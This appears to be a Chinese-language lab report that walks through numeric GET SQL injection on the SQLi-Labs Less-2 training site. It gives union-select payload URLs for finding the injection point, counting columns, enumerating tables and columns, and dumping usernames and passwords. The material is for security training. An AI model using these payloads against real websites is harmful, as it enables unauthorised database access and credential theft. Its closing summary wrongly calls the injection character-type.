实验目的:
理解数字型GET注入的原理和特点,掌握利用联合查询(union select)的方法实现SQL注入的基本流程
实验原理
数字型GET注入,其注入点存在于URL中的GET参数处,如
http://wwwtestweb.com/userphp?id=8,而服务器后端实际查询代码原型诸如:
"select ... from ...where id=$id…”。
攻击者可以通过构造恶意的GET输入参数,利用union select命令进行注入,暴露数据库中存储的信息。
实验步骤
本实验的目标是:以SQLi-Labs网站的Less-2为入口,利用联合查询(union select)的方式实施SQL注入,获取SQLi-Labs网站的登录用户名和密码。
1.访问SQLi-Labs网站
在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的
SQLi-Labs网站Less-2。访问的URL为:
注:因为我把sqli-labs文件名字改为了sql,所以以下sqli-labs均以sql表示
http://[靶机IP]/sqli-labs/Less-2/
根据网页提示,给GET定一个参数
http://[靶机IP]/sql/Less-2/?id=1
注:该实验中Firefox浏览器已经提前安装好HackBar插件,在上图的界面中右击鼠标,点击 检查 即可进入控制台,随后点击HackBar即可使用该插件 (部分机型按F12即可进入控制台)
2.寻找注入点
分别使用一下三条payload寻找注入点并判断注入点的类型
http://[靶机IP]/sql/Less-2/?id=1'
运行报错
http://[靶机IP]/sql/Less-2/?id=1 and 1=1
运行正常
http://[靶机IP]/sql/Less-2/?id=1 and 1=2
运行异常
由此可以判断出:网站存在数字型注入点
3.判断网站查询的字数段
使用以下payload获取网站查询的字数段(关键字order by):
http://[靶机IP]/sql/Less-2/?id=1 order by 1--+
显示正常
http://[靶机IP]/sql/Less-2/?id=1 order by 2--+
显示正常
http://[靶机IP]/sql/Less-2/?id=1 order by 3--+
显示正常
http://[靶机IP]/sql/Less-2/?id=1 order by 4--+
报错
由此可以判断出:网站查询数字段为3
4.判断网站的回显位置
利用以下payload判断网站的回显位置
http://[靶机IP]/sql/Less-2/?id=1 and 1=2 union select 1,2,3--+
显示2号位和3号位可以回显
5.获取网站当前所在数据库的库名
使用以下payload获取网站所在数据库的名字
http://[靶机IP]/sql/Less-2/?id=1 and 1=2 union select 1,2,database()--+
结果为:security
6.获取数据库security的全部表名
使用以下payload获取数据库security的全部表名
http://[靶机IP]/sql/Less-2/?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
显示结果中,有一个名为users的表,这当中可能存放着网站用户的基本信息。
7.获取users表的全部字段名
使用以下payload获取users表的全部字段名:
http://[靶机IP]/sql/Less-2/?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+.
8.获取users表id、username和password字段的全部值。
由于users表中存放着多组用户名和密码的数据,而每次只能显示一组数据,我们可以通过limit M,N的方式逐条显示,如
(1)显示第1组数据
注:下列的命令中末尾的0,1即为赋予M,N的值
http://「靶机IP1/sql/Less-2/?id=1 and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 0,1--+
显示结果为Dump,Dump。
(2)显示第2组数据
http://「靶机IP1/sql/Less-2/?id=1 and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 1,1--+
显示结果为Angelina,l-kill-you
(3)显示第3组数据
http://「靶机IP1/sql/Less-2/?id=1 and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 2,1--+
显示结果为Dummy,p@ssword
以此类推,可以通过修改limit后面的参数,将users表中存放的所有用户信息全部暴露出来
实验总结
本次实验,成功实现了对存在字符型GET注入点的网站的手工SQL注入,掌握了基于联合查询的注入方法和流程。